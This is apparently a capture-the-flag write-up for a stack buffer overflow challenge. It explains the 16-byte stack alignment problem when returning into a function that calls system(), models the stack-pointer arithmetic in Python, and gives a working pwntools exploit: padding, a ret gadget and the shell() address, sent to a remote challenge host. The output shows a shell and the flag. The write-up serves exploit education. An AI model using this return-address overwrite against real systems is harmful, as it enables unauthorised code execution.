Okay, okay. So you were smart enough to do basic overflow huh...
Now try this challenge! I patched the shell function so it calls system instead of execve
... so now your exploit shouldn't work! bwahahahahaha
Note: due to the copycat nature of this challenge, it suffers from the same bug that was in basic-overflow. See the cryptic message there for more information.
```
gdb-peda$ i functions
All defined functions:
Non-debugging symbols:
0x0000000000401000 _init
0x0000000000401030 system@plt
0x0000000000401040 gets@plt
0x0000000000401050 _start
0x0000000000401080 _dl_relocate_static_pie
0x0000000000401136 shell
0x000000000040114c main
0x000000000040116c _fini
```
When I reuse the basic-overflow challenge payload and jump straight into shell, which now calls system, the process crashes with SIGSEGV.
This is because some 64-bit libc functions require the stack to be 16-byte aligned when they are called: $rsp should end in 0 at the call instruction, so that the callee sees it end in 8 once the return address has been pushed. Returning from the overflow directly into shell skips that push, so the stack pointer is off by 8 for the rest of the chain and system faults.
To resolve this, I add an extra ret gadget (0x40101a) at the beginning of the ROP chain. When that ret is invoked it pops one qword and increments $rsp by 8, which restores the expected alignment before shell runs.
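The alignment argument above, worked through as a small stack-pointer model. This is an added illustration, not code from the writeup; it assumes shell() is compiled as "push rbp; mov rbp, rsp; ... call system@plt" (typical gcc output, not verified against the binary) and uses a constructed value for $rsp at main's ret.

```python
# Added model of x86-64 stack alignment through the ROP chain; not part of the
# original writeup. Assumes shell() begins with "push rbp; mov rbp, rsp" and
# then executes "call system@plt" (typical gcc output, an assumption here).

RET_GADGET = 0x40101a  # the lone "ret" gadget from the writeup
SHELL = 0x401136       # shell(), from the gdb function listing


def entry_aligned(rsp):
    # SysV x86-64 ABI: the caller aligns rsp to 16 before CALL, and CALL
    # pushes an 8-byte return address, so a callee expects rsp % 16 == 8.
    return rsp % 16 == 8


def rsp_at_system_entry(chain, rsp_at_main_ret):
    """Walk the chain starting at main's RET and return rsp as system() is
    entered. Each RET pops one qword (+8); shell's prologue pushes rbp (-8)
    and its CALL pushes the return address (-8)."""
    rsp = rsp_at_main_ret
    for addr in chain:
        rsp += 8                      # the RET that transfers control to addr
        if addr == RET_GADGET:
            continue                  # a bare RET just pops the next entry
        if addr == SHELL:
            rsp -= 8                  # push rbp
            rsp -= 8                  # call system@plt
            return rsp
        raise ValueError(f"unexpected chain entry {addr:#x}")
    raise ValueError("chain never reaches shell()")


def system_call_ok(chain, rsp_at_main_ret):
    """True if system() is entered with the alignment the ABI promises it."""
    return entry_aligned(rsp_at_system_entry(chain, rsp_at_main_ret))


if __name__ == "__main__":
    # Constructed sample: at main's RET, rsp ends in 8 (main was entered with
    # rsp ending in 8, and "push rbp" / "leave; pop rbp" cancel each other).
    rsp0 = 0x7fffffffe0b8
    print("direct jump to shell:", system_call_ok([SHELL], rsp0))             # False
    print("ret gadget first:   ", system_call_ok([RET_GADGET, SHELL], rsp0))  # True
```

Without the gadget system() is entered with $rsp ending in 0 instead of 8, which is exactly the SIGSEGV seen above; one extra RET shifts every later stack pointer by 8 and fixes it.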
```python
from pwn import *

# p = process('./patched-shell')
p = remote('34.134.173.142', 5000)

ret = 0x40101a              # lone "ret" gadget, used only to re-align the stack
shell = 0x0000000000401136  # shell(), from the gdb function listing

# 72 bytes of padding reach the saved return address; the ret gadget runs
# first, then control lands in shell() with $rsp aligned as system expects.
payload = b"A"*72 + p64(ret) + p64(shell)
p.sendline(payload)
p.interactive()
```
"""
[+] Opening connection to 34.134.173.142 on port 5000: Done
[*] Switching to interactive mode
$ ls
flag
run
$ cat flag
uoftctf{patched_the_wrong_function}
"""